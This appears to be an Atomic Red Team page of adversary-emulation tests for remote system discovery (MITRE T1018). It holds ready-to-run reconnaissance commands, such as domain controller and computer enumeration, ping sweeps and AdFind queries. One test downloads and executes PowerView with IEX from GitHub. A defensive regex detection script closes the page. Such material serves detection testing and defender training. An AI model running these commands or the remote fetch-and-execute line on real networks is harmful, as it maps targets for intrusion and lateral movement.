Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used, such as [Ping](https://attack.mitre.org/software/S0097) or `net view` using [Net](https://attack.mitre.org/software/S0039). Adversaries may also analyze data from local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts`) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment. Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. `show cdp neighbors`, `show arp`).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
Atomic Test #2 - Remote System Discovery - net group Domain Computers
Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects
Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects
Atomic Test #16 - Enumerate domain computers within Active Directory using DirectorySearcher
Atomic Test #17 - Enumerate Active Directory Computers with Get-AdComputer
Atomic Test #18 - Enumerate Active Directory Computers with ADSISearcher
Atomic Test #20 - Get-WmiObject to Enumerate Domain Controllers
Atomic Test #21 - Remote System Discovery - net group Domain Controller
Identify remote systems with net.exe.

Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.

Supported Platforms: Windows
auto_generated_guid: 85321a9c-897f-4a60-9f20-29788e50bccd

Attack Commands (run with command_prompt):

```cmd
net view /domain
net view
```
Identify remote systems with net.exe querying the Active Directory Domain Computers group.

Upon successful execution, cmd.exe will run net.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.

Supported Platforms: Windows
auto_generated_guid: f1bf6c8f-9016-4edf-aff9-80b65f5d711f

Attack Commands (run with command_prompt):

```cmd
net group "Domain Computers" /domain
```
Identify domain controllers for the specified domain.

Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.

Supported Platforms: Windows
auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_domain | Domain to query for domain controllers | string | %userdnsdomain% |

Attack Commands (run with command_prompt):

```cmd
nltest.exe /dclist:#{target_domain}
```
Identify remote systems via ping sweep.

Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.

Supported Platforms: Windows
auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| start_host | Last octet starting value for ping sweep. | string | 1 |
| stop_host | Last octet ending value for ping sweep. | string | 254 |
| subnet | Subnet used for ping sweep. | string | 192.168.1 |

Attack Commands (run with command_prompt):

```cmd
for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i
```
Identify remote systems via arp.

Upon successful execution, cmd.exe will execute arp to list out the ARP cache. Output will be via stdout.

Supported Platforms: Windows
auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574

Attack Commands (run with command_prompt):

```cmd
arp -a
```
Identify remote systems via arp.

Upon successful execution, sh will execute arp to list out the ARP cache. Output will be via stdout.

Supported Platforms: Linux, macOS
auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951

Attack Commands (run with sh):

```sh
arp -a | grep -v '^?'
```

Dependencies (run with sh):

Check prereq commands:

```sh
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
```

Get prereq commands:

```sh
(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)
```
Identify remote systems via ping sweep.

Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 network and echo via stdout if an IP is active.

Supported Platforms: Linux, macOS
auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| start_host | Last octet starting value for ping sweep. | string | 1 |
| stop_host | Last octet ending value for ping sweep. | string | 254 |
| subnet | Subnet used for ping sweep. | string | 192.168.1 |

Attack Commands (run with sh):

```sh
for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
```
PowerShell script that runs nslookup via cmd.exe against the local /24 network of the first network adapter listed in ipconfig.

Upon successful execution, PowerShell will identify the IP range (via ipconfig) and perform a for loop that executes nslookup against that IP range. Output will be via stdout.

Supported Platforms: Windows
auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f

Attack Commands (run with powershell; elevation required, e.g. root or admin):

```powershell
# Take the first ipconfig line containing a dotted address and keep its last token (the IPv4 address)
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
# Reverse-resolve every host in the local /24 through cmd.exe
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
```
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes on internal networks. Python 3 and adidnsdump must be installed; use the get_prereq_commands to meet the prerequisites for this test. Successful execution of this test will list DNS zones in the terminal.

Supported Platforms: Windows
auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username including domain. | string | domain\user |
| acct_pass | Account password. | string | password |
| host_name | Hostname or IP address to connect to. | string | 192.168.1.1 |
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1018 |

Attack Commands (run with command_prompt; elevation required, e.g. root or admin):

```cmd
"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
```

Dependencies (run with powershell):

Check prereq commands:

```powershell
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```

Get prereq commands:

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
```

Check prereq commands:

```powershell
if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 }
```

Get prereq commands:

```powershell
py -m venv "#{venv_path}"
```

Check prereq commands:

```powershell
if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```

Get prereq commands:

```powershell
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null
```
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects. References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

Supported Platforms: Windows
auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |

Attack Commands (run with command_prompt):

```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}
```

Dependencies (run with powershell):

Check prereq commands:

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```

Get prereq commands:

```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects. References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

Supported Platforms: Windows
auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |

Attack Commands (run with command_prompt):

```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist
```

Dependencies (run with powershell):

Check prereq commands:

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```

Get prereq commands:

```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
Use the ip neighbour command to display the known link-layer (ARP table) addresses for hosts sharing the same network segment.

Supported Platforms: Linux
auto_generated_guid: 158bd4dd-6359-40ab-b13c-285b9ef6fa25

Attack Commands (run with sh):

```sh
ip neighbour show
```

Dependencies (run with sh):

Check prereq commands:

```sh
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
```

Get prereq commands:

```sh
apt-get install iproute2 -y
```
Use the ip route command to display the kernel's routing tables.

Supported Platforms: Linux
auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1

Attack Commands (run with sh):

```sh
ip route show
```

Dependencies (run with sh):

Check prereq commands:

```sh
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
```

Get prereq commands:

```sh
apt-get install iproute2 -y
```
Use the netstat command to display the kernel's routing tables.

Supported Platforms: Linux
auto_generated_guid: d2791d72-b67f-4615-814f-ec824a91f514

Attack Commands (run with sh):

```sh
netstat -r | grep default
```
Use the ip tcp_metrics command to display the recently cached entries for IPv4 and IPv6 source and destination addresses.

Supported Platforms: Linux
auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388

Attack Commands (run with sh):

```sh
ip tcp_metrics show |grep --invert-match "^127\."
```

Dependencies (run with sh):

Check prereq commands:

```sh
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
```

Get prereq commands:

```sh
apt-get install iproute2 -y
```
This test is a PowerShell script that enumerates Active Directory to determine which computers are joined to the domain. The test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement. Reference: Head Fake: Tackling Disruptive Ransomware Attacks. Upon successful execution, this test will output the names of the computers that reside on the domain to the console window.

Supported Platforms: Windows
auto_generated_guid: 962a6017-1c09-45a6-880b-adc9c57cb22e

Attack Commands (run with powershell):

```powershell
# Search the default naming context for every computer object
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
# Only fetch the Name attribute; Out-Null discards the index that Add() returns
$DirectorySearcher.PropertiesToLoad.Add("Name") | Out-Null
$Computers = $DirectorySearcher.findall()
foreach ($Computer in $Computers) {
    $Computer = $Computer.Properties.name
    if (!$Computer) { Continue }
    Write-Host $Computer
}
```

Dependencies (run with powershell):

Check prereq commands:

```powershell
if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
```

Get prereq commands:

```powershell
write-host "This PC must be manually added to a domain."
```
The following Atomic test will utilize Get-AdComputer to enumerate computers within Active Directory. Upon successful execution, a listing of computers will be output with their paths in AD. Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md

Supported Platforms: Windows
auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf

Attack Commands (run with powershell):

```powershell
Get-AdComputer -Filter *
```
The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory. Upon successful execution, a listing of computers will be output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/

Supported Platforms: Windows
auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d

Attack Commands (run with powershell):

```powershell
([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
```
Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.

Supported Platforms: Windows
auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4

Attack Commands (run with powershell):

```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
```
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers. Upon successful execution, a listing of systems from AD will be output with their paths. Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1

Supported Platforms: Windows
auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad

Attack Commands (run with powershell):

```powershell
try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
catch { $_; exit $_.Exception.HResult }
```
Identify remote systems with net.exe querying the Active Directory Domain Controllers group. Upon successful execution, cmd.exe will run net.exe against Active Directory to list the "Domain Controllers" group in the domain. Output will be via stdout.

Supported Platforms: Windows
auto_generated_guid: 5843529a-5056-4bc1-9c13-a311e2af4ca0

Attack Commands (run with command_prompt):

```cmd
net group /domain "Domain controllers"
```
This test uses Netscan to identify remote hosts in a specified network range.

Supported Platforms: Windows
auto_generated_guid: b8147c9a-84db-4ec1-8eee-4e0da75f0de5

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| netscan_path | NetScan exe location | path | PathToAtomicsFolder\..\ExternalPayloads\netscan\64-bit\netscan.exe |
| range_to_scan | The IP range to scan with Netscan | string | 127.0.0.1-127.0.0.1 |

Attack Commands (run with powershell):

```powershell
cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'
```

Cleanup Commands:

```powershell
remove-item "$env:temp\T1018NetscanOutput.txt" -force -erroraction silentlycontinue
```

Dependencies (run with powershell):

Check prereq commands:

```powershell
if (Test-Path "#{netscan_path}") {exit 0} else {exit 1}
```

Get prereq commands:

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" "https://www.softperfect.com/download/files/netscan_portable.zip"
Expand-Archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\netscan"
```
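As an added detection-side example (not part of this Atomic Red Team page or its tests), the following Python script matches the command lines the tests above execute (net view, net group ... /domain, nltest /dclist, arp -a, ping loops, AdFind computer and dclist queries, the PowerShell AD searchers, ip neighbour/route/tcp_metrics) against process-creation records and flags a host where one user ran several distinct discovery families, since a single `net view` is routine admin noise. The `ts|host|user|cmdline` record format and the sample lines are constructed assumptions, not a real log source.

```python
import re
from collections import defaultdict

# One rule per discovery command family that the atomic tests above execute.
RULES = [
    ("net view",          re.compile(r"\bnet1?(?:\.exe)?\s+view\b", re.I)),
    ("net group /domain", re.compile(r"\bnet1?(?:\.exe)?\s+group\b.*/domain", re.I)),
    ("nltest /dclist",    re.compile(r"\bnltest(?:\.exe)?\b.*/dclist", re.I)),
    ("arp cache dump",    re.compile(r"\barp(?:\.exe)?\s+-a\b", re.I)),
    ("ping sweep loop",   re.compile(r"\bfor\b.*\bping\b.*-[nc]\s+1\b", re.I)),
    ("adfind computers",  re.compile(r"\badfind(?:\.exe)?\b.*(objectcategory=computer|-sc\s+dclist)", re.I)),
    ("AD computer enum",  re.compile(r"Get-AdComputer|\[adsisearcher\]|DirectorySearcher|ds_computer", re.I)),
    ("ip neigh/route",    re.compile(r"\bip\s+(neigh\w*|route|tcp_metrics)\s+show\b", re.I)),
]

def parse_event(line):
    """Parse a constructed 'ts|host|user|cmdline' process-creation record (assumed format)."""
    ts, host, user, cmdline = line.rstrip("\n").split("|", 3)
    return {"ts": ts, "host": host, "user": user, "cmdline": cmdline}

def classify(cmdline):
    """Return the labels of every discovery rule that matches one command line."""
    return [label for label, rx in RULES if rx.search(cmdline)]

def detect(lines, min_distinct=2):
    """Return (per-event hits, {(host, user): labels} where >= min_distinct families ran)."""
    seen = defaultdict(set)                       # (host, user) -> rule labels observed
    hits = []                                     # (ts, host, user, label) per matching event
    for line in lines:
        ev = parse_event(line)
        for label in classify(ev["cmdline"]):
            seen[(ev["host"], ev["user"])].add(label)
            hits.append((ev["ts"], ev["host"], ev["user"], label))
    # Several distinct families from one user on one host resemble the ordered
    # reconnaissance these tests model; a lone hit is left as low-priority telemetry.
    flagged = {k: sorted(v) for k, v in seen.items() if len(v) >= min_distinct}
    return hits, flagged

# Constructed sample telemetry for this example; not real logs.
SAMPLE = [
    "2024-05-01T10:00:01Z|WS01|CORP\\jdoe|net view /domain",
    "2024-05-01T10:00:07Z|WS01|CORP\\jdoe|net group \"Domain Computers\" /domain",
    "2024-05-01T10:00:15Z|WS01|CORP\\jdoe|nltest.exe /dclist:corp.local",
    "2024-05-01T10:01:02Z|WS01|CORP\\jdoe|for /l %i in (1,1,254) do ping -n 1 -w 100 10.0.0.%i",
    "2024-05-01T10:02:30Z|WS02|CORP\\svc_backup|net view \\\\fileserver",
    "2024-05-01T10:03:00Z|SRV03|root|ip neighbour show",
    "2024-05-01T10:03:10Z|WS04|CORP\\admin|notepad.exe report.txt",
]
```

Calling `detect(SAMPLE)` returns six per-event hits but flags only WS01/CORP\jdoe, whose session chains four families; lower `min_distinct` to 1 to surface the single-command hosts as well.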